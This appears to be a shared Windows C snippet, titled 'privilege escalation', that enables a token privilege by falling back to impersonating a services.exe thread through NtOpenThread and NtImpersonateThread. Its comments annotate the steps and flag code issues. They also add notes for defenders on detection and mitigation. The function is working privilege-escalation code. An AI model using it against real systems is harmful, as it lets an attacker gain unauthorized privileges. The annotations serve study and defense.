@FadeTrack
2017-05-24T16:11:48.000000Z
提权:
// Enables one token privilege, identified by its SE_*_PRIVILEGE index
// (Priviliage), for the calling context.
//
// Order of attempts visible below:
//   1. RtlAdjustPrivilege on the process token (CurrentThread = FALSE);
//   2. RtlAdjustPrivilege on the thread token   (CurrentThread = TRUE);
//   3. only if both fail: locate services.exe in the SystemProcessInformation
//      list, open its first listed thread with THREAD_DIRECT_IMPERSONATION,
//      impersonate that thread on the current thread, and retry step 2
//      against the resulting impersonation token.
//
// Returns TRUE when one of the RtlAdjustPrivilege calls succeeded. The
// previous enabled state written to bEnable is not surfaced to the caller.
// Nothing in this function reverts the impersonation established in step 3,
// so on that path the calling thread keeps the impersonation token after
// return.
//
// Defender notes: step 3 is the observable part — a thread-handle open on
// services.exe requesting THREAD_DIRECT_IMPERSONATION, followed by
// NtImpersonateThread from a process that is not itself a service. Thread
// handle callbacks (ObRegisterCallbacks) or ETW tracing of these calls can
// surface it; the NtOpenThread call only succeeds when the calling identity
// already has that access to services.exe threads, so restricting which
// identities can open service-process threads is the mitigation.
BOOL GetPrivilege(ULONG Priviliage)
{
BOOL bRet = FALSE;
NTSTATUS St;
// Out-parameter of RtlAdjustPrivilege (previous state); never read here.
BOOLEAN bEnable;
// Steps 1 and 2: process token first, then thread token. Short-circuit ||
// means the second call only runs when the first fails.
bRet = NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,FALSE,&bEnable)) || NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable));
if (!bRet)
{
// GetSystemInformation is a helper defined elsewhere in the project. Its
// result is released with free() below, so it presumably hands back a
// malloc()-style buffer holding the SystemProcessInformation list —
// confirm against its definition.
PSYSTEM_PROCESSES_INFORMATION Processes = (PSYSTEM_PROCESSES_INFORMATION)GetSystemInformation(SystemProcessInformation);
if (Processes)
{
UNICODE_STRING ProcessName = RTL_CONSTANT_STRING(L"services.exe");
// Walk the variable-length entries. NextEntryDelta is a byte offset to the
// next record; the explicit break at the end of the body handles the last
// record, whose delta is 0.
// NOTE(review): the pointer is advanced through a ULONG lvalue cast, which
// is only correct where a pointer is 32 bits wide and is a strict-aliasing
// violation in standard C.
for (PSYSTEM_PROCESSES_INFORMATION Proc=Processes; ; *(ULONG*)&Proc += Proc->NextEntryDelta)
{
// Case-insensitive comparison (third argument TRUE) of the image name.
if (RtlEqualUnicodeString(&Proc->ProcessName,&ProcessName,TRUE))
{
HANDLE hThread;
OBJECT_ATTRIBUTES ObjAttr;
InitializeObjectAttributes(&ObjAttr,NULL,0,0,0);
// Open the first listed thread of the matched process with the
// impersonation access right only.
// NOTE(review): Threads[0] is read without consulting the entry's thread
// count — assumes at least one thread is listed; confirm against the
// structure definition.
St = NtOpenThread(&hThread,THREAD_DIRECT_IMPERSONATION,&ObjAttr,&Proc->Threads[0].ClientId);
if (NT_SUCCESS(St))
{
// Impersonation level (not delegation) with dynamic context tracking.
SECURITY_QUALITY_OF_SERVICE SecurityQos = {0};
SecurityQos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
SecurityQos.ImpersonationLevel = SecurityImpersonation;
SecurityQos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
// Make the current thread impersonate the opened thread.
St = NtImpersonateThread(NtCurrentThread(),hThread,&SecurityQos);
if (NT_SUCCESS(St))
{
// Retry against the thread token, which now is the impersonation token.
St = RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable);
bRet = NT_SUCCESS(St);
if (!bRet)
{
// Format string is a compile-time literal (string concatenation with
// __FUNCTION__), so no format-string hazard here.
DbgPrint(__FUNCTION__"(): RtlAdjustPrivilege failed with status %x\n",St);
}
}
else
{
DbgPrint(__FUNCTION__"(): NtImpersonateThread failed with status %x\n",St);
}
// The thread handle is no longer needed once impersonation has been
// attempted; the impersonation itself (if any) is left in place.
NtClose(hThread);
}
else
{
DbgPrint(__FUNCTION__"(): NtOpenThread failed with status %x\n",St);
}
// Only the first services.exe match is tried, whatever the outcome.
break;
}
// Delta of 0 marks the final record in the list.
if (!Proc->NextEntryDelta) break;
}
// Release the process list obtained from GetSystemInformation.
free(Processes);
}
}
return bRet;
}